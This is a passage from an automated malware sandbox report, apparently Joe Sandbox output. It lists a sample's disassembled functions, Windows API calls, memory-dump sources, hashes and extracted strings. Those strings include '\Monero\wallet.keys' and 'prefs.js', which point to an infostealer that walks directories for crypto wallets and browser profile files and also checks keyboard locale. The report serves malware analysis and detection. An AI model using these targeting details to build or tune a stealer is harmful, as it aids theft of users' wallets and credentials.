                  • FindFirstFileA.KERNEL32(?,?), ref: 00D43EDA
                  • StrCmpCA.SHLWAPI(?,00D50FAC), ref: 00D43F08
                  • StrCmpCA.SHLWAPI(?,00D50FB0), ref: 00D43F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4406C
                  • FindClose.KERNEL32(000000FF), ref: 00D44081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                  • Instruction ID: 2b687ed4e12ca080d8043852e855e51006bda27a38e8105f3614e78126ffa0f1
                  • Opcode Fuzzy Hash: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                  • Instruction Fuzzy Hash: 865136B2900218ABCB24EBB4DC45EEE737CFB98300F444598B65D96140DB75DB899F72
                  Function 00D3ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00D3ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D3ED55
                  • StrCmpCA.SHLWAPI(?,00D51538), ref: 00D3EDAB
                  • StrCmpCA.SHLWAPI(?,00D5153C), ref: 00D3EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3F2AE
                  • FindClose.KERNEL32(000000FF), ref: 00D3F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                  • Instruction ID: f3e1a19a09c6271c50a2559fd4154a2a590b6aa7f23adb607653ab60b373f78c
                  • Opcode Fuzzy Hash: bd219b53c6d2f73af22e2400b2e8c6bc06ac30b17d145bd77658a742e9b304b5
                  • Instruction Fuzzy Hash: 10E1AF72951128ABFB55FB64DC52EEE7338EF54300F414599B50A62092EE306F8ACF72
                  Function 010F2317 Relevance: 16.6, Strings: 12, Instructions: 1568COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: C3w$ X3_$ X3_$7Uw$>$W:$GH{:$R)z$o@|u$}\rw$}\rw$A/$ojg
                  • API String ID: 0-161611651
                  • Opcode ID: 68e4f5344e4657204b65b9edd02c6a0c4e7b9964b119d7cdbc4f3b01e0b234fe
                  • Instruction ID: b217039df361b52fa1f7f178e632a07d00e623d97eed6c6226666279d97c6e55
                  • Opcode Fuzzy Hash: 68e4f5344e4657204b65b9edd02c6a0c4e7b9964b119d7cdbc4f3b01e0b234fe
                  • Instruction Fuzzy Hash: 8DB2F6F3A0C204AFE704AF29EC8567ABBE5EF94720F16493DEAC4C3740E63558458697
                  Function 00D3F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515B8,00D50D96), ref: 00D3F71E
                  • StrCmpCA.SHLWAPI(?,00D515BC), ref: 00D3F76F
                  • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00D3FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                  • Instruction ID: f50455b1ed5ae4b23b5da05b335e6b5f6252c761a3fe7b043a96e919945107a9
                  • Opcode Fuzzy Hash: a3cd4836a864f57e3d0fc1bdf0ea92f80c8b2f7f4746d7d0a8274efaf37da962
                  • Instruction Fuzzy Hash: 83B103719401189BDB24FF64DC96FEE7379EF94300F4085A9A80A96151EF30AB49CFB2
                  Function 00D316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5510C,?,?,?,00D551B4,?,?,00000000,?,00000000), ref: 00D31923
                  • StrCmpCA.SHLWAPI(?,00D5525C), ref: 00D31973
                  • StrCmpCA.SHLWAPI(?,00D55304), ref: 00D31989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00D31DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E20
                  • FindClose.KERNEL32(000000FF), ref: 00D31E32
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                  • Instruction ID: 3f16e45d94f0651284f9f78644363def1c608f383060d45a0d1f022562ed99cb
                  • Opcode Fuzzy Hash: 307d2676bb44fb0f51457fbe206a264cf2ce1c9af28c372b4407ceadba99cc0f
                  • Instruction Fuzzy Hash: 90121E71950118ABEB19FB64DC96EEE7378EF54300F4145A9B50A62091EF306F89CFB2
                  Function 00D3DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00D50C2E), ref: 00D3DE5E
                  • StrCmpCA.SHLWAPI(?,00D514C8), ref: 00D3DEAE
                  • StrCmpCA.SHLWAPI(?,00D514CC), ref: 00D3DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3E3E0
                  • FindClose.KERNEL32(000000FF), ref: 00D3E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                  • Instruction ID: f0ae026ba27d94ff183f41b72f25efc8ffa20efc66cdbcbc9526c5bfa3761740
                  • Opcode Fuzzy Hash: 504100a35f5cb9b439495369eb2b799f265f7f74aad5cee2d5b58942fae4c3a1
                  • Instruction Fuzzy Hash: 79F17D718541289BEB15EB64DC96EEE7338FF54304F9141DAA41A62091EF306F8ACF72
                  Function 00D3DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D514B0,00D50C2A), ref: 00D3DAEB
                  • StrCmpCA.SHLWAPI(?,00D514B4), ref: 00D3DB33
                  • StrCmpCA.SHLWAPI(?,00D514B8), ref: 00D3DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3DDCC
                  • FindClose.KERNEL32(000000FF), ref: 00D3DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                  • Instruction ID: 029664e6f4bb696c25dc6c440fec34672b04335a7a58fe3eb093ca3f7ac7904c
                  • Opcode Fuzzy Hash: d90b50e7fed52864b823f5638cac0e13bfb08ff1679b0e3caadcf5b87076b36a
                  • Instruction Fuzzy Hash: 64913172900118ABDB14FB74EC569ED737DEF94300F418668F90A96181EE349B598FB3
                  Function 00D47B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00D505AF), ref: 00D47BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00D47BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00D47C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00D47C62
                  • LocalFree.KERNEL32(00000000), ref: 00D47D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                  • Instruction ID: d7bd04513c9b0b82fe4e31eba809ba8bffe8b2b198257dc52f367b5b45b236f8
                  • Opcode Fuzzy Hash: 19081bb7519234a8a14033a5ae626fcef186d9597edc4f6a8943596b3cd0944a
                  • Instruction Fuzzy Hash: DF413C71940218ABDB24DF94DC99BEEB7B8FF44700F204199E50962191DB346F89CFB2
                  Function 010F3D54 Relevance: 10.3, Strings: 7, Instructions: 1558COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (';s$Dzto$Ty}_$lw~$xJMo$o/$EUv
                  • API String ID: 0-1288683632
                  • Opcode ID: 759d0c823a25f662f1b666a7b0ff3117566299add40fee1f678a949f9afb1ce7
                  • Instruction ID: 9236e614e4fd8908f771de20e1586c7089ead2b9837ce45c0abc06bd9ed7d4f3
                  • Opcode Fuzzy Hash: 759d0c823a25f662f1b666a7b0ff3117566299add40fee1f678a949f9afb1ce7
                  • Instruction Fuzzy Hash: AEB2F4F3A0C2109FE7046E29EC8567AFBE9EF94720F1A493DEAC587744E63558008797
                  Function 00D3E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00D50D73), ref: 00D3E4A2
                  • StrCmpCA.SHLWAPI(?,00D514F8), ref: 00D3E4F2
                  • StrCmpCA.SHLWAPI(?,00D514FC), ref: 00D3E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
